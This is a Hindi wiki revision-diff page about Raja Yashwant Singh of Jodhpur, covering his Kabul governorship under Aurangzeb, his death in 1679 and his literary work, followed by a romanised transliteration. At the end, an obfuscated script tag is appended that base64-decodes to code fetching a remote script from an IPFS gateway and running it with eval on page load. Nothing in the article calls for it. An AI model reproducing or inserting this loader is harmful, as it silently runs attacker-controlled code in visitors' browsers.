Difference between revisions of "यशवंतसिंह"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " कायम" to " क़ायम")
 
Line 1: Line 1:
 
'''राजा यशवंत सिंह'''<br />
 
'''राजा यशवंत सिंह'''<br />
[[जोधपुर]] नरेश यशवंत सिंह [[औरंगज़ेब]] के दरबार का एक प्रभावशाली सामंत था। उससे पीछा छुड़ाने को औरंगज़ेब ने उसे राजधानी से बहुत दूर उत्तर-पश्चिम में [[क़ाबुल]] का सूबेदार बना कर भेज दिया था । [[क़ाबुल]] सूबे के [[ख़ैबर दर्रा|ख़ैबर दर्रे]] में उन दिनों क़बाइली [[पठान|पठानों]] ने बड़ा उपद्रव मचा रखा था । उनसे संघर्ष करते हुए [[मुग़ल|मु्ग़लों]] के कई [[सूबेदार]] मारे जा चुके थे । यशवंत सिंह औरंगज़ेब की धूर्तता को समझता था और अपनी वृद्धावस्था में उस कठिन अभियान के लिए इतनी दूर जाना भी नहीं चाहता था, किंतु शाही कोप से बचने के लिए वह चला गया था। सन् 1671 से सन् 1679 तक के 8 वर्षों में वह [[क़ाबुल]] में ही रहा था । उस काल में उसने पठान उपद्रवियों को दबा कर वहाँ शांति और व्यवस्था कायम कर दी थी । अंत में 10 दिसंबर 1679 में उसका [[क़ाबुल]] में ही देहांत हो गया । ऐसा जान पड़ता है यशवंत सिंह की [[दाह क्रिया|दाह−क्रिया]] [[क़ाबुल]] में ही हुई थी और उसके [[अस्थि अवशेष|अस्थि−अवशेष]] [[आगरा]] लाये गये थे। उनके साथ उनकी 9 रानियाँ आगरा में सती हुई थी। उक्त स्थल पर एक छतरी बनाई गई जो अभी तक विद्यमान है।  
+
[[जोधपुर]] नरेश यशवंत सिंह [[औरंगज़ेब]] के दरबार का एक प्रभावशाली सामंत था। उससे पीछा छुड़ाने को औरंगज़ेब ने उसे राजधानी से बहुत दूर उत्तर-पश्चिम में [[क़ाबुल]] का सूबेदार बना कर भेज दिया था । [[क़ाबुल]] सूबे के [[ख़ैबर दर्रा|ख़ैबर दर्रे]] में उन दिनों क़बाइली [[पठान|पठानों]] ने बड़ा उपद्रव मचा रखा था । उनसे संघर्ष करते हुए [[मुग़ल|मु्ग़लों]] के कई [[सूबेदार]] मारे जा चुके थे । यशवंत सिंह औरंगज़ेब की धूर्तता को समझता था और अपनी वृद्धावस्था में उस कठिन अभियान के लिए इतनी दूर जाना भी नहीं चाहता था, किंतु शाही कोप से बचने के लिए वह चला गया था। सन् 1671 से सन् 1679 तक के 8 वर्षों में वह [[क़ाबुल]] में ही रहा था । उस काल में उसने पठान उपद्रवियों को दबा कर वहाँ शांति और व्यवस्था क़ायम कर दी थी । अंत में 10 दिसंबर 1679 में उसका [[क़ाबुल]] में ही देहांत हो गया । ऐसा जान पड़ता है यशवंत सिंह की [[दाह क्रिया|दाह−क्रिया]] [[क़ाबुल]] में ही हुई थी और उसके [[अस्थि अवशेष|अस्थि−अवशेष]] [[आगरा]] लाये गये थे। उनके साथ उनकी 9 रानियाँ आगरा में सती हुई थी। उक्त स्थल पर एक छतरी बनाई गई जो अभी तक विद्यमान है।  
 
*राजा यशवंतसिंह चतुर राजनीतिज्ञ, कुशल सेनानी और वीर योद्धा होने के साथ ही साथ कवि, साहित्याचार्य और तत्वज्ञानी था तथा साहित्यकारों एवं विद्वानों का वह आश्रयदाता था। [[हिन्दी]] साहित्य में उसकी प्रसिद्धि काव्यशास्त्र के आचार्य के रूप में है। उसका '''"भाषाभूषण"''' ग्रंथ हिन्दी [[अलंकार]] शास्त्र  की एक प्रसिद्ध रचना है। उसके अतिरिक्त उसके कई ग्रंथ [[तत्वज्ञान]] से संबंधित हैं।
 
*राजा यशवंतसिंह चतुर राजनीतिज्ञ, कुशल सेनानी और वीर योद्धा होने के साथ ही साथ कवि, साहित्याचार्य और तत्वज्ञानी था तथा साहित्यकारों एवं विद्वानों का वह आश्रयदाता था। [[हिन्दी]] साहित्य में उसकी प्रसिद्धि काव्यशास्त्र के आचार्य के रूप में है। उसका '''"भाषाभूषण"''' ग्रंथ हिन्दी [[अलंकार]] शास्त्र  की एक प्रसिद्ध रचना है। उसके अतिरिक्त उसके कई ग्रंथ [[तत्वज्ञान]] से संबंधित हैं।
 
<blockquote>यह वही राजा यशवंत सिंह है जिसने औरंगज़ेब को यह बताने के लिए कि राजपूत शेर से भी नहीं डरते, अपने बेटे पृथ्वी सिंह को निहत्था ही शेर से लड़ा दिया था। यह प्रसंग एक लोक-कथा और लोक-गीत के रूप में उत्तरी भारत में प्रचलित है।</blockquote>
 
<blockquote>यह वही राजा यशवंत सिंह है जिसने औरंगज़ेब को यह बताने के लिए कि राजपूत शेर से भी नहीं डरते, अपने बेटे पृथ्वी सिंह को निहत्था ही शेर से लड़ा दिया था। यह प्रसंग एक लोक-कथा और लोक-गीत के रूप में उत्तरी भारत में प्रचलित है।</blockquote>

Latest revision as of 14:16, 29 January 2013

raja yashavant sianh
jodhapur naresh yashavant sianh aurangazeb ke darabar ka ek prabhavashali samant tha. usase pichha chhu dane ko aurangazeb ne use rajadhani se bahut door uttar-pashchim mean qabul ka soobedar bana kar bhej diya tha . qabul soobe ke khaibar darre mean un dinoan qabaili pathanoan ne b da upadrav macha rakha tha . unase sangharsh karate hue muhgaloan ke kee soobedar mare ja chuke the . yashavant sianh aurangazeb ki dhoortata ko samajhata tha aur apani vriddhavastha mean us kathin abhiyan ke lie itani door jana bhi nahian chahata tha, kiantu shahi kop se bachane ke lie vah chala gaya tha. sanh 1671 se sanh 1679 tak ke 8 varshoan mean vah qabul mean hi raha tha . us kal mean usane pathan upadraviyoan ko daba kar vahaan shaanti aur vyavastha qayam kar di thi . aant mean 10 disanbar 1679 mean usaka qabul mean hi dehaant ho gaya . aisa jan p data hai yashavant sianh ki dah−kriya qabul mean hi huee thi aur usake asthi−avashesh agara laye gaye the. unake sath unaki 9 raniyaan agara mean sati huee thi. ukt sthal par ek chhatari banaee gee jo abhi tak vidyaman hai.

  • raja yashavantasianh chatur rajanitijn, kushal senani aur vir yoddha hone ke sath hi sath kavi, sahityachary aur tatvajnani tha tatha sahityakaroan evan vidvanoan ka vah ashrayadata tha. hindi sahity mean usaki prasiddhi kavyashastr ke achary ke roop mean hai. usaka "bhashabhooshan" granth hindi alankar shastr ki ek prasiddh rachana hai. usake atirikt usake kee granth tatvajnan se sanbandhit haian.

yah vahi raja yashavant sianh hai jisane aurangazeb ko yah batane ke lie ki rajapoot sher se bhi nahian darate, apane bete prithvi sianh ko nihattha hi sher se l da diya tha. yah prasang ek lok-katha aur lok-git ke roop mean uttari bharat mean prachalit hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>